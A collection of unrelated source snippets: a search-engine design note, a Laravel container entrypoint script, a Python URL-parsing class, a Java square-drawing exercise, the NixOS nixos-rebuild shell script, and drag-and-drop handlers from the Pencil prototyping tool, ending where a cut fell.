The search engine should be built using an index data structure, such as a trie or hash table, to store each word in the website. The search engine should scan and store all of the words in the website in its data structure. When a user enters a query, the search engine should search its data structure for the words in the query and return the results. The search engine should also have a ranking system for better search results, such as page rank or term frequency–inverse document frequency. |
#!/bin/sh
umask 0000
cd /var/www
# php artisan migrate:fresh --seed
php artisan cache:clear
php artisan route:cache
php artisan storage:link
#php artisan migrate
#php artisan schedule:work
/usr/bin/supervisord -c /etc/supervisord.conf
|
from urllib.parse import urlparse, parse_qs
class URLRequest:
def __init__(self):
self._url = None
@property
def url(self):
if self._url:
return self._url.geturl()
return None
@url.setter
def url(self, value):
self._url = urlparse(value)
@property
def host(self):
if self._url:
return f"{self._url.hostname}:{self._url.port}"
return None
@property
def hostname(self):
if self._url:
return self._url.hostname
return None
@property
def domain(self):
return self.hostname # Alias for hostname
@property
def path(self):
if self._url:
return self._url.path
return None
@property
def port(self):
if self._url:
return self._url.port
return None
@property
def args(self):
if self._url:
return parse_qs(self._url.query)
@property
def params(self):
return self.args # Alias for args
@property
def query_params(self):
return self.args # Alias for args
@property
def GET(self):
return self.args # Alias for args
@property
def query_string(self):
if self._url:
return self._url.query
return None
def set_url(self, url):
self._url = urlparse(url)
def get_url(self):
return self._url |
<reponame>EgorSoroka/job4j
package ru.job4j.figures;
/**
* Рисует квадрат.
* @author <NAME> ( https://vk.com/id428714363)
* @version 1.0
* @since 19.06.19
*/
public class Square implements Shape {
/**
* Рисует квадрат.
* @return квадрат.
*/
@Override
public String draw() {
StringBuilder square = new StringBuilder();
square.append("++++" + "\n");
square.append("++++" + "\n");
square.append("++++" + "\n");
square.append("++++" + "\n");
return square.toString();
}
}
|
#! @runtimeShell@
if [ -x "@runtimeShell@" ]; then export SHELL="@runtimeShell@"; fi;
set -e
set -o pipefail
export PATH=@path@:$PATH
showSyntax() {
exec man nixos-rebuild
exit 1
}
# Parse the command line.
origArgs=("$@")
extraBuildFlags=()
lockFlags=()
flakeFlags=()
action=
buildNix=1
fast=
rollback=
upgrade=
upgrade_all=
repair=
profile=/nix/var/nix/profiles/system
buildHost=
targetHost=
maybeSudo=()
while [ "$#" -gt 0 ]; do
i="$1"; shift 1
case "$i" in
--help)
showSyntax
;;
switch|boot|test|build|edit|dry-build|dry-run|dry-activate|build-vm|build-vm-with-bootloader)
if [ "$i" = dry-run ]; then i=dry-build; fi
action="$i"
;;
--install-grub)
echo "$0: --install-grub deprecated, use --install-bootloader instead" >&2
export NIXOS_INSTALL_BOOTLOADER=1
;;
--install-bootloader)
export NIXOS_INSTALL_BOOTLOADER=1
;;
--no-build-nix)
buildNix=
;;
--rollback)
rollback=1
;;
--upgrade)
upgrade=1
;;
--upgrade-all)
upgrade=1
upgrade_all=1
;;
--repair)
repair=1
extraBuildFlags+=("$i")
;;
--max-jobs|-j|--cores|-I|--builders)
j="$1"; shift 1
extraBuildFlags+=("$i" "$j")
;;
--show-trace|--keep-failed|-K|--keep-going|-k|--verbose|-v|-vv|-vvv|-vvvv|-vvvvv|--fallback|--repair|--no-build-output|-Q|-j*|-L|--refresh|--no-net)
extraBuildFlags+=("$i")
;;
--option)
j="$1"; shift 1
k="$1"; shift 1
extraBuildFlags+=("$i" "$j" "$k")
;;
--fast)
buildNix=
fast=1
extraBuildFlags+=(--show-trace)
;;
--profile-name|-p)
if [ -z "$1" ]; then
echo "$0: ‘--profile-name’ requires an argument"
exit 1
fi
if [ "$1" != system ]; then
profile="/nix/var/nix/profiles/system-profiles/$1"
mkdir -p -m 0755 "$(dirname "$profile")"
fi
shift 1
;;
--build-host|h)
buildHost="$1"
shift 1
;;
--target-host|t)
targetHost="$1"
shift 1
;;
--use-remote-sudo)
maybeSudo=(sudo --)
;;
--flake)
flake="$1"
flakeFlags=(--experimental-features 'nix-command flakes')
shift 1
;;
--recreate-lock-file|--no-update-lock-file|--no-write-lock-file|--no-registries|--commit-lock-file)
lockFlags+=("$i")
;;
--update-input)
j="$1"; shift 1
lockFlags+=("$i" "$j")
;;
--override-input)
j="$1"; shift 1
k="$1"; shift 1
lockFlags+=("$i" "$j" "$k")
;;
*)
echo "$0: unknown option \`$i'"
exit 1
;;
esac
done
if [ -n "$SUDO_USER" ]; then
maybeSudo=(sudo --)
fi
if [ -z "$buildHost" -a -n "$targetHost" ]; then
buildHost="$targetHost"
fi
if [ "$targetHost" = localhost ]; then
targetHost=
fi
if [ "$buildHost" = localhost ]; then
buildHost=
fi
buildHostCmd() {
if [ -z "$buildHost" ]; then
"$@"
elif [ -n "$remoteNix" ]; then
ssh $SSHOPTS "$buildHost" env PATH="$remoteNix:$PATH" "${maybeSudo[@]}" "$@"
else
ssh $SSHOPTS "$buildHost" "${maybeSudo[@]}" "$@"
fi
}
targetHostCmd() {
if [ -z "$targetHost" ]; then
"${maybeSudo[@]}" "$@"
else
ssh $SSHOPTS "$targetHost" "${maybeSudo[@]}" "$@"
fi
}
copyToTarget() {
if ! [ "$targetHost" = "$buildHost" ]; then
if [ -z "$targetHost" ]; then
NIX_SSHOPTS=$SSHOPTS nix-copy-closure --from "$buildHost" "$1"
elif [ -z "$buildHost" ]; then
NIX_SSHOPTS=$SSHOPTS nix-copy-closure --to "$targetHost" "$1"
else
buildHostCmd nix-copy-closure --to "$targetHost" "$1"
fi
fi
}
nixBuild() {
if [ -z "$buildHost" ]; then
nix-build "$@"
else
local instArgs=()
local buildArgs=()
while [ "$#" -gt 0 ]; do
local i="$1"; shift 1
case "$i" in
-o)
local out="$1"; shift 1
buildArgs+=("--add-root" "$out" "--indirect")
;;
-A)
local j="$1"; shift 1
instArgs+=("$i" "$j")
;;
-I) # We don't want this in buildArgs
shift 1
;;
--no-out-link) # We don't want this in buildArgs
;;
"<"*) # nix paths
instArgs+=("$i")
;;
*)
buildArgs+=("$i")
;;
esac
done
local drv="$(nix-instantiate "${instArgs[@]}" "${extraBuildFlags[@]}")"
if [ -a "$drv" ]; then
NIX_SSHOPTS=$SSHOPTS nix-copy-closure --to "$buildHost" "$drv"
buildHostCmd nix-store -r "$drv" "${buildArgs[@]}"
else
echo "nix-instantiate failed"
exit 1
fi
fi
}
if [ -z "$action" ]; then showSyntax; fi
# Only run shell scripts from the Nixpkgs tree if the action is
# "switch", "boot", or "test". With other actions (such as "build"),
# the user may reasonably expect that no code from the Nixpkgs tree is
# executed, so it's safe to run nixos-rebuild against a potentially
# untrusted tree.
canRun=
if [ "$action" = switch -o "$action" = boot -o "$action" = test ]; then
canRun=1
fi
# If ‘--upgrade’ or `--upgrade-all` is given,
# run ‘nix-channel --update nixos’.
if [[ -n $upgrade && -z $_NIXOS_REBUILD_REEXEC && -z $flake ]]; then
# If --upgrade-all is passed, or there are other channels that
# contain a file called ".update-on-nixos-rebuild", update them as
# well. Also upgrade the nixos channel.
for channelpath in /nix/var/nix/profiles/per-user/root/channels/*; do
channel_name=$(basename "$channelpath")
if [[ "$channel_name" == "nixos" ]]; then
nix-channel --update "$channel_name"
elif [ -e "$channelpath/.update-on-nixos-rebuild" ]; then
nix-channel --update "$channel_name"
elif [[ -n $upgrade_all ]] ; then
nix-channel --update "$channel_name"
fi
done
fi
# Make sure that we use the Nix package we depend on, not something
# else from the PATH for nix-{env,instantiate,build}. This is
# important, because NixOS defaults the architecture of the rebuilt
# system to the architecture of the nix-* binaries used. So if on an
# amd64 system the user has an i686 Nix package in her PATH, then we
# would silently downgrade the whole system to be i686 NixOS on the
# next reboot.
if [ -z "$_NIXOS_REBUILD_REEXEC" ]; then
export PATH=@nix@/bin:$PATH
fi
# Use /etc/nixos/flake.nix if it exists. It can be a symlink to the
# actual flake.
if [[ -z $flake && -e /etc/nixos/flake.nix ]]; then
flake="$(dirname "$(readlink -f /etc/nixos/flake.nix)")"
fi
# Re-execute nixos-rebuild from the Nixpkgs tree.
# FIXME: get nixos-rebuild from $flake.
if [[ -z $_NIXOS_REBUILD_REEXEC && -n $canRun && -z $fast && -z $flake ]]; then
if p=$(nix-build --no-out-link --expr 'with import <nixpkgs/nixos> {}; config.system.build.nixos-rebuild' "${extraBuildFlags[@]}"); then
export _NIXOS_REBUILD_REEXEC=1
exec $p/bin/nixos-rebuild "${origArgs[@]}"
exit 1
fi
fi
# For convenience, use the hostname as the default configuration to
# build from the flake.
if [[ -n $flake ]]; then
if [[ $flake =~ ^(.*)\#([^\#\"]*)$ ]]; then
flake="${BASH_REMATCH[1]}"
flakeAttr="${BASH_REMATCH[2]}"
fi
if [[ -z $flakeAttr ]]; then
read -r hostname < /proc/sys/kernel/hostname
if [[ -z $hostname ]]; then
hostname=default
fi
flakeAttr="nixosConfigurations.\"$hostname\""
else
flakeAttr="nixosConfigurations.\"$flakeAttr\""
fi
fi
# Resolve the flake.
if [[ -n $flake ]]; then
flake=$(nix "${flakeFlags[@]}" flake info --json "${extraBuildFlags[@]}" "${lockFlags[@]}" -- "$flake" | jq -r .url)
fi
# Find configuration.nix and open editor instead of building.
if [ "$action" = edit ]; then
if [[ -z $flake ]]; then
NIXOS_CONFIG=${NIXOS_CONFIG:-$(nix-instantiate --find-file nixos-config)}
if [[ -d $NIXOS_CONFIG ]]; then
NIXOS_CONFIG=$NIXOS_CONFIG/default.nix
fi
exec ${EDITOR:-nano} "$NIXOS_CONFIG"
else
exec nix "${flakeFlags[@]}" edit "${lockFlags[@]}" -- "$flake#$flakeAttr"
fi
exit 1
fi
tmpDir=$(mktemp -t -d nixos-rebuild.XXXXXX)
SSHOPTS="$NIX_SSHOPTS -o ControlMaster=auto -o ControlPath=$tmpDir/ssh-%n -o ControlPersist=60"
cleanup() {
for ctrl in "$tmpDir"/ssh-*; do
ssh -o ControlPath="$ctrl" -O exit dummyhost 2>/dev/null || true
done
rm -rf "$tmpDir"
}
trap cleanup EXIT
# If the Nix daemon is running, then use it. This allows us to use
# the latest Nix from Nixpkgs (below) for expression evaluation, while
# still using the old Nix (via the daemon) for actual store access.
# This matters if the new Nix in Nixpkgs has a schema change. It
# would upgrade the schema, which should only happen once we actually
# switch to the new configuration.
# If --repair is given, don't try to use the Nix daemon, because the
# flag can only be used directly.
if [ -z "$repair" ] && systemctl show nix-daemon.socket nix-daemon.service | grep -q ActiveState=active; then
export NIX_REMOTE=${NIX_REMOTE-daemon}
fi
# First build Nix, since NixOS may require a newer version than the
# current one.
if [ -n "$rollback" -o "$action" = dry-build ]; then
buildNix=
fi
nixSystem() {
machine="$(uname -m)"
if [[ "$machine" =~ i.86 ]]; then
machine=i686
fi
echo $machine-linux
}
prebuiltNix() {
machine="$1"
if [ "$machine" = x86_64 ]; then
echo @nix_x86_64_linux@
elif [[ "$machine" =~ i.86 ]]; then
echo @nix_i686_linux@
else
echo "$0: unsupported platform"
exit 1
fi
}
remotePATH=
if [[ -n $buildNix && -z $flake ]]; then
echo "building Nix..." >&2
nixDrv=
if ! nixDrv="$(nix-instantiate '<nixpkgs/nixos>' --add-root $tmpDir/nix.drv --indirect -A config.nix.package.out "${extraBuildFlags[@]}")"; then
if ! nixDrv="$(nix-instantiate '<nixpkgs>' --add-root $tmpDir/nix.drv --indirect -A nix "${extraBuildFlags[@]}")"; then
if ! nixStorePath="$(nix-instantiate --eval '<nixpkgs/nixos/modules/installer/tools/nix-fallback-paths.nix>' -A $(nixSystem) | sed -e 's/^"//' -e 's/"$//')"; then
nixStorePath="$(prebuiltNix "$(uname -m)")"
fi
if ! nix-store -r $nixStorePath --add-root $tmpDir/nix --indirect \
--option extra-binary-caches https://cache.nixos.org/; then
echo "warning: don't know how to get latest Nix" >&2
fi
# Older version of nix-store -r don't support --add-root.
[ -e $tmpDir/nix ] || ln -sf $nixStorePath $tmpDir/nix
if [ -n "$buildHost" ]; then
remoteNixStorePath="$(prebuiltNix "$(buildHostCmd uname -m)")"
remoteNix="$remoteNixStorePath/bin"
if ! buildHostCmd nix-store -r $remoteNixStorePath \
--option extra-binary-caches https://cache.nixos.org/ >/dev/null; then
remoteNix=
echo "warning: don't know how to get latest Nix" >&2
fi
fi
fi
fi
if [ -a "$nixDrv" ]; then
nix-store -r "$nixDrv"'!'"out" --add-root $tmpDir/nix --indirect >/dev/null
if [ -n "$buildHost" ]; then
nix-copy-closure --to "$buildHost" "$nixDrv"
# The nix build produces multiple outputs, we add them all to the remote path
for p in $(buildHostCmd nix-store -r "$(readlink "$nixDrv")" "${buildArgs[@]}"); do
remoteNix="$remoteNix${remoteNix:+:}$p/bin"
done
fi
fi
PATH="$tmpDir/nix/bin:$PATH"
fi
# Update the version suffix if we're building from Git (so that
# nixos-version shows something useful).
if [[ -n $canRun && -z $flake ]]; then
if nixpkgs=$(nix-instantiate --find-file nixpkgs "${extraBuildFlags[@]}"); then
suffix=$($SHELL $nixpkgs/nixos/modules/installer/tools/get-version-suffix "${extraBuildFlags[@]}" || true)
if [ -n "$suffix" ]; then
echo -n "$suffix" > "$nixpkgs/.version-suffix" || true
fi
fi
fi
if [ "$action" = dry-build ]; then
extraBuildFlags+=(--dry-run)
fi
# Either upgrade the configuration in the system profile (for "switch"
# or "boot"), or just build it and create a symlink "result" in the
# current directory (for "build" and "test").
if [ -z "$rollback" ]; then
echo "building the system configuration..." >&2
if [ "$action" = switch -o "$action" = boot ]; then
if [[ -z $flake ]]; then
pathToConfig="$(nixBuild '<nixpkgs/nixos>' --no-out-link -A system "${extraBuildFlags[@]}")"
else
outLink=$tmpDir/result
nix "${flakeFlags[@]}" build "$flake#$flakeAttr.config.system.build.toplevel" \
"${extraBuildFlags[@]}" "${lockFlags[@]}" --out-link $outLink
pathToConfig="$(readlink -f $outLink)"
fi
copyToTarget "$pathToConfig"
targetHostCmd nix-env -p "$profile" --set "$pathToConfig"
elif [ "$action" = test -o "$action" = build -o "$action" = dry-build -o "$action" = dry-activate ]; then
if [[ -z $flake ]]; then
pathToConfig="$(nixBuild '<nixpkgs/nixos>' -A system -k "${extraBuildFlags[@]}")"
else
nix "${flakeFlags[@]}" build "$flake#$flakeAttr.config.system.build.toplevel" "${extraBuildFlags[@]}" "${lockFlags[@]}"
pathToConfig="$(readlink -f ./result)"
fi
elif [ "$action" = build-vm ]; then
if [[ -z $flake ]]; then
pathToConfig="$(nixBuild '<nixpkgs/nixos>' -A vm -k "${extraBuildFlags[@]}")"
else
nix "${flakeFlags[@]}" build "$flake#$flakeAttr.config.system.build.vm" \
"${extraBuildFlags[@]}" "${lockFlags[@]}"
pathToConfig="$(readlink -f ./result)"
fi
elif [ "$action" = build-vm-with-bootloader ]; then
if [[ -z $flake ]]; then
pathToConfig="$(nixBuild '<nixpkgs/nixos>' -A vmWithBootLoader -k "${extraBuildFlags[@]}")"
else
nix "${flakeFlags[@]}" build "$flake#$flakeAttr.config.system.build.vmWithBootLoader" \
"${extraBuildFlags[@]}" "${lockFlags[@]}"
pathToConfig="$(readlink -f ./result)"
fi
else
showSyntax
fi
# Copy build to target host if we haven't already done it
if ! [ "$action" = switch -o "$action" = boot ]; then
copyToTarget "$pathToConfig"
fi
else # [ -n "$rollback" ]
if [ "$action" = switch -o "$action" = boot ]; then
targetHostCmd nix-env --rollback -p "$profile"
pathToConfig="$profile"
elif [ "$action" = test -o "$action" = build ]; then
systemNumber=$(
targetHostCmd nix-env -p "$profile" --list-generations |
sed -n '/current/ {g; p;}; s/ *\([0-9]*\).*/\1/; h'
)
pathToConfig="$profile"-${systemNumber}-link
if [ -z "$targetHost" ]; then
ln -sT "$pathToConfig" ./result
fi
else
showSyntax
fi
fi
# If we're not just building, then make the new configuration the boot
# default and/or activate it now.
if [ "$action" = switch -o "$action" = boot -o "$action" = test -o "$action" = dry-activate ]; then
if ! targetHostCmd $pathToConfig/bin/switch-to-configuration "$action"; then
echo "warning: error(s) occurred while switching to the new configuration" >&2
exit 1
fi
fi
if [ "$action" = build-vm ]; then
cat >&2 <<EOF
Done. The virtual machine can be started by running $(echo $pathToConfig/bin/run-*-vm)
EOF
fi
|
Pencil.dragObserverClasses = [];
Pencil.registerDragObserver = function (observerClass) {
Pencil.dragObserverClasses.push(observerClass);
};
Pencil.installDragObservers = function (canvas) {
for (var factory in Pencil.dragObserverClasses) {
var constructorFunction = Pencil.dragObserverClasses[factory];
var observer = new constructorFunction(canvas);
canvas.dragObservers.push(observer);
}
};
function ShapeDefDragObserver(canvas) {
this.canvas = canvas;
this.name = "ShapeDefDragObserver";
this.aboutToDelete = false;
this.deleteDiscarded = false;
this.lastDragEnterTS = new Date().getTime();
}
ShapeDefDragObserver.prototype = {
getSupportedFlavours : function () {
var flavours = new FlavourSet();
flavours.appendFlavour("pencil/def");
return flavours;
},
onDragEnter: function (event, session) {
var now = new Date().getTime();
var delta = now - this.lastDragEnterExitEventTS;
this.lastDragEnterExitEventTS = now;
var defId = event.dataTransfer.getData("pencil/def");
var defId = nsDragAndDrop.getData("pencil/def");
this.dragStart = false;
debug("onDragEnter, defId: " + defId);
var def = CollectionManager.shapeDefinition.locateDefinition(defId);
var loc = this.canvas.getEventLocation(event, "withoutZoom");
this.canvas.insertShapeImpl_(def, new Bound(loc.x, loc.y, null, null));
//fake move marking:
this.canvas.startFakeMove(event);
this.commited = false;
this.hasDrag = true;
},
exit: function (event) {
//console.log("Event ", event);
this.aboutToDelete = false;
if (this.deleteDiscarded) {
return;
}
if (!this.commited && this.hasDrag) {
var loc = {
x: event.clientX,
y: event.clientY
}
if (loc.x == 0 && loc.y == 0 ) {
this.commited = true;
this.canvas.finishMoving(event);
} else {
this.canvas.deleteSelected();
}
console.log("event: ", event);
// var loc = this.canvas.locDrag;
// var cRect = this.canvas.svg.getBoundingClientRect();
// var aPane = Pencil.controller.applicationPane.contentBody.getBoundingClientRect();
// var pane = {
// x: Math.round(aPane.left),
// y: Math.round(aPane.top),
// w: Math.round(aPane.width),
// h: Math.round(aPane.height)
// }
// //console.log("cRect: ", cRect);
// var rec = {
// x: Math.round(cRect.left),
// y: Math.round(cRect.top),
// w: Math.round(cRect.width),
// h: Math.round(cRect.height)
// }
// console.log("rect", rec);
// console.log("pane", pane);
// console.log("location: ", loc);
// if (loc.x >= rec.x && loc.x <= rec.w
// && loc.y >= rec.y && loc.y <= rec.h
// && loc.x >= pane.x && loc.x <= pane.w
// && loc.y >= pane.y && loc.y <= pane.h) {
// this.commited = true;
// this.canvas.finishMoving(event);
// } else {
// this.canvas.deleteSelected();
// }
}
this.hasDrag = false;
},
onDragStart: function (evt, transferData, action) {
this.dragStart = true;
},
onDragExit: function (event, session) {
this.exit(event);
},
onDragOver: function (event, flavour, session) {
// console.log("drag over", event);
if (!this.commited && this.hasDrag) {
if (event.clientX != this._lastScreenX || event.clientY != this._lastScreenY) {
this.canvas.handleMouseMove(event, "fake");
this._lastScreenX = event.clientX;
this._lastScreenY = event.clientY;
}
}
},
onDrop: function (event, transferData, session) {
this.commited = true;
this.canvas.finishMoving(event);
}
};
Pencil.registerDragObserver(ShapeDefDragObserver);
function PrivateShapeDefDragObserver(canvas) {
this.canvas = canvas;
this.name = "PrivateShapeDefDragObserver";
this.aboutToDelete = false;
this.deleteDiscarded = false;
this.lastDragEnterTS = new Date().getTime();
}
PrivateShapeDefDragObserver.prototype = {
getSupportedFlavours : function () {
var flavours = new FlavourSet();
flavours.appendFlavour("pencil/privatedef");
return flavours;
},
onDragEnter: function (event, session) {
var now = new Date().getTime();
var delta = now - this.lastDragEnterExitEventTS;
this.lastDragEnterExitEventTS = now;
if (this.aboutToDelete) {
this.deleteDiscarded = true;
return;
}
// if (delta < 200) return;
// var transferData = nsTransferable.get(this.getSupportedFlavours(), nsDragAndDrop.getDragData, true);
// var defId = null;
// try {
// defId = transferData.first.first.data;
// } catch (e) {
// return;
// }
var defId = event.dataTransfer.getData("pencil/privatedef");
var defId = nsDragAndDrop.getData("pencil/privatedef");
var def = PrivateCollectionManager.locateShapeDefinition(defId);
var loc = this.canvas.getEventLocation(event, "withoutZoom");
this.canvas.insertPrivateShapeImpl_(def, new Bound(loc.x, loc.y, null, null));
//fake move marking:
this.canvas.startFakeMove(event);
this.commited = false;
this.hasDrag = true;
},
exit: function (event) {
this.aboutToDelete = false;
if (this.deleteDiscarded) {
return;
}
if (!this.commited && this.hasDrag) {
console.log("event: ", event);
var loc = {
x: event.clientX,
y: event.clientY
}
if (loc.x == 0 && loc.y == 0 ) {
this.commited = true;
this.canvas.finishMoving(event);
} else {
this.canvas.deleteSelected();
}
// var loc = this.canvas.getEventLocation(event);
// var cRect = this.canvas.svg.getBoundingClientRect();
// //console.log("cRect: ", cRect);
// var rec = {
// x: Math.round(cRect.left),
// y: Math.round(cRect.top),
// w: Math.round(cRect.width),
// h: Math.round(cRect.height)
// }
// console.log("loc: ", loc);
// console.log("rect: ", rec);
// if (loc.x >= rec.x && loc.x <= rec.w
// && loc.y >= rec.y && loc.y <= rec.h) {
// console.log("finishMoving: ", loc);
// this.commited = true;
// this.canvas.finishMoving(event);
// this.canvas.leaveTarget = this.canvas.currentController;
//
// } else {
// this.canvas.deleteSelected();
// }
}
this.hasDrag = false;
},
onDragExit: function (event, session) {
var thiz = this;
this.aboutToDelete = true;
this.deleteDiscarded = false;
window.setTimeout(function () {
thiz.exit(event);
}, 10);
},
onDragOver: function (event, flavour, session) {
if (!this.commited && this.hasDrag) {
if (event.clientX != this._lastScreenX || event.clientY != this._lastScreenY) {
this.canvas.handleMouseMove(event, "fake");
this._lastScreenX = event.clientX;
this._lastScreenY = event.clientY;
}
}
},
onDrop: function (event, transferData, session) {
this.commited = true;
this.canvas.finishMoving(event);
}
};
Pencil.registerDragObserver(PrivateShapeDefDragObserver);
//====================================================================================
function ShapeShortcutDragObserver(canvas) {
this.canvas = canvas;
this.aboutToDelete = false;
this.deleteDiscarded = false;
this.lastDragEnterTS = new Date().getTime();
}
ShapeShortcutDragObserver.prototype = {
getSupportedFlavours : function () {
var flavours = new FlavourSet();
flavours.appendFlavour("pencil/shortcut");
return flavours;
},
onDragEnter: function (event, session) {
var now = new Date().getTime();
var delta = now - this.lastDragEnterExitEventTS;
this.lastDragEnterExitEventTS = now;
var defId = event.dataTransfer.getData("pencil/shortcut");
var defId = nsDragAndDrop.getData("pencil/shortcut");
var shortcut = CollectionManager.shapeDefinition.locateShortcut(defId);
var def = shortcut.shape;
var overridingValueMap = shortcut.propertyMap;
overridingValueMap._shortcut = shortcut;
var loc = this.canvas.getEventLocation(event, "withoutZoom");
this.canvas.insertShapeImpl_(def, new Bound(loc.x, loc.y, null, null), overridingValueMap);
//fake move marking:
this.commited = false;
this.hasDrag = true;
this.canvas.startFakeMove(event);
},
exit: function (event) {
this.aboutToDelete = false;
if (this.deleteDiscarded) {
return;
}
if (!this.commited && this.hasDrag) {
// console.log("event: ", event);
// var loc = this.canvas.getEventLocation(event);
// var cRect = this.canvas.svg.getBoundingClientRect();
// //console.log("cRect: ", cRect);
// var rec = {
// x: Math.round(cRect.left),
// y: Math.round(cRect.top),
// w: Math.round(cRect.width),
// h: Math.round(cRect.height)
// }
// console.log("loc: ", loc);
// console.log("rect: ", rec);
// if (loc.x >= rec.x && loc.x <= rec.w
// && loc.y >= rec.y && loc.y <= rec.h) {
// console.log("finishMoving: ", loc);
// this.commited = true;
// this.canvas.finishMoving(event);
// this.canvas.leaveTarget = this.canvas.currentController;
//
// } else {
// this.canvas.deleteSelected();
// }
var loc = {
x: event.clientX,
y: event.clientY
}
if (loc.x == 0 && loc.y == 0 ) {
this.commited = true;
this.canvas.finishMoving(event);
} else {
this.canvas.deleteSelected();
}
}
this.hasDrag = false;
},
onDragExit: function (event, session) {
this.exit(event);
},
onDragOver: function (event, flavour, session) {
if (!this.commited && this.hasDrag) {
if (event.clientX != this._lastScreenX || event.clientY != this._lastScreenY) {
this.canvas.handleMouseMove(event, "fake");
this._lastScreenX = event.clientX;
this._lastScreenY = event.clientY;
}
}
},
onDrop: function (event, transferData, session) {
this.commited = true;
this.canvas.finishMoving(event);
}
};
Pencil.registerDragObserver(ShapeShortcutDragObserver);
//====================================================================================
function RichTextDragObserver(canvas) {
this.canvas = canvas;
}
RichTextDragObserver.prototype = {
getSupportedFlavours : function () {
var flavours = new FlavourSet();
flavours.appendFlavour("text/html");
return flavours;
},
onDragOver: function (evt, flavour, session){},
onDrop: function (evt, transferData, session) {
var html = transferData.data;
try {
var xhtml = Dom.toXhtml(html);
console.log("html: " + xhtml);
var textPaneDef = CollectionManager.shapeDefinition.locateDefinition(RichTextXferHelper.SHAPE_DEF_ID);
if (!textPaneDef) return;
this.canvas.insertShape(textPaneDef, null);
if (this.canvas.currentController) {
this.canvas.currentController.setProperty(RichTextXferHelper.SHAPE_CONTENT_PROP_NAME, new RichText(xhtml));
}
} catch (e) {
throw e;
}
}
};
Pencil.registerDragObserver(RichTextDragObserver);
//====================================================================================
function FileDragObserver(canvas) {
this.canvas = canvas;
}
FileDragObserver.prototype = {
acceptsDataTransfer : function (dataTransfer) {
return dataTransfer && dataTransfer.files && dataTransfer.files.length > 0;
},
onDragOver: function (evt, flavour, session){},
onDrop: function (evt, dataTransfer, session) {
for (var i = 0; i < dataTransfer.files.length; i ++) {
var file = dataTransfer.files[i];
var fileType = path.extname(file.path);
if (!fileType) return;
fileType = fileType.substring(1).toLowerCase();
var loc = this.canvas.getEventLocation(evt, "withoutZoom");
if (FileDragObserver.fileTypeHandler[fileType]) {
FileDragObserver.fileTypeHandler[fileType](this.canvas, file.path, loc);
}
}
}
};
FileDragObserver.SVG_SHAPE_DEF_ID = "Evolus.Common:SVGImage";
FileDragObserver.fileTypeHandler = {
_handleImageFile: function (canvas, url, loc, transparent) {
try {
var def = CollectionManager.shapeDefinition.locateDefinition(PNGImageXferHelper.SHAPE_DEF_ID);
if (!def) return;
canvas.insertShape(def, new Bound(loc.x, loc.y, null, null));
if (!canvas.currentController) return;
var controller = canvas.currentController;
var handler = function (imageData) {
var r = imageData.w / (canvas.width * 0.9);
r = Math.max(r, imageData.h / (canvas.height * 0.9));
if (r < 1) r = 1;
var dim = new Dimension(imageData.w / r, imageData.h / r);
controller.setProperty("imageData", imageData);
controller.setProperty("box", dim);
if (transparent) {
controller.setProperty("fillColor", Color.fromString("#ffffff00"));
}
canvas.invalidateEditors();
};
ImageData.fromExternalToImageData(url, handler);
} catch (e) {
Console.dumpError(e);
}
},
png: function (canvas, url, loc) {
debug(url);
this._handleImageFile(canvas, url, loc, "transparent");
},
jpg: function (canvas, url, loc) {
this._handleImageFile(canvas, url, loc);
},
gif: function (canvas, url, loc) {
this._handleImageFile(canvas, url, loc, "transparent");
},
svg: function (canvas, url, loc) {
var file = fileHandler.getFileFromURLSpec(url).QueryInterface(Components.interfaces.nsILocalFile);
var fileContents = FileIO.read(file, XMLDocumentPersister.CHARSET);
FileDragObserver.handleSVGData(fileContents, canvas, loc);
},
ep: function (canvas, url) {
Pencil.documentHandler.loadDocument(url);
},
epz: function (canvas, url) {
Pencil.documentHandler.loadDocument(url);
},
epgz: function (canvas, url) {
Pencil.documentHandler.loadDocument(url);
}
};
FileDragObserver.handleSVGData = function (svg, canvas, loc) {
try {
var domParser = new DOMParser();
var dom = domParser.parseFromString(svg, "text/xml");
FileDragObserver.handleSVGDOM(dom, canvas, loc);
} catch (e) {
Console.dumpError(e);
}
}
FileDragObserver.svgMeasuringNode = null;
FileDragObserver.handleSVGDOM = function (dom, canvas, loc) {
if (!loc) {
loc = canvas.lastMouse || {x: 10, y: 10};
}
var fromOC = dom.documentElement.getAttributeNS(PencilNamespaces.p, "ImageSource");
var width = Svg.getWidth(dom);
var height = Svg.getHeight(dom);
console.log("WxH", [width, height]);
var dx = 0;
var dy = 0;
//parse the provided svg viewBox
if (dom.documentElement.viewBox) {
var viewBox = dom.documentElement.viewBox.baseVal;
if (viewBox.width > 0 && viewBox.height > 0) {
width = viewBox.width;
height = viewBox.height;
dx = viewBox.x;
dy = viewBox.y;
}
}
var g = dom.createElementNS(PencilNamespaces.svg, "g");
while (dom.documentElement.childNodes.length > 0) {
var firstChild = dom.documentElement.firstChild;
dom.documentElement.removeChild(firstChild);
g.appendChild(firstChild);
}
if (fromOC) {
g.setAttributeNS(PencilNamespaces.p, "p:ImageSource", fromOC);
if (fromOC == "OpenClipart.org") {
Dom.renewId(g, /([a-zA-Z0-9]+)/i);
}
}
// if (!FileDragObserver.svgMeasuringNode) {
// var div = document.createElement("div");
// div.style.cssText = "position: absolute; left: 0px; top: 0px; width: 5px; height: 5px; overflow: hidden; visibility: hidden;";
// document.body.appendChild(div);
// var svg = document.createElementNS(PencilNamespaces.svg, "svg:svg");
// svg.setAttribute("version", "1.0");
// svg.setAttribute("width", 10);
// svg.setAttribute("height", 10);
//
// div.appendChild(svg);
// FileDragObserver.svgMeasuringNode = svg;
// }
//
// Dom.empty(FileDragObserver.svgMeasuringNode);
// FileDragObserver.svgMeasuringNode.appendChild(g);
// FileDragObserver.svgMeasuringNode.removeChild(g);
//g.setAttribute("transform", "translate(" + (0 - dx) + "," + (0 - dy) + ")");
var g0 = dom.createElementNS(PencilNamespaces.svg, "g");
g0.appendChild(g);
dom.replaceChild(g0, dom.documentElement);
var def = CollectionManager.shapeDefinition.locateDefinition(FileDragObserver.SVG_SHAPE_DEF_ID);
canvas.insertShape(def, new Bound(loc.x - width / 2, loc.y - height / 2, null, null));
if (canvas.currentController) {
var controller = canvas.currentController;
var w = width;
var h = height;
var maxWidth = canvas.width * 0.9;
var maxHeight = canvas.height * 0.9;
if (Config.get("clipartbrowser.scale") == true && (w > maxWidth || h > maxHeight)) {
var r = Math.max(w / maxWidth, h / maxHeight);
w /= r;
h /= r;
}
var dim = new Dimension(w, h);
controller.setProperty("svgXML", new PlainText(Dom.serializeNode(dom.documentElement)));
controller.setProperty("box", dim);
controller.setProperty("originalDim", new Dimension(width, height));
}
}
Pencil.registerDragObserver(FileDragObserver);
function SVGDragObserver(canvas) {
this.canvas = canvas;
}
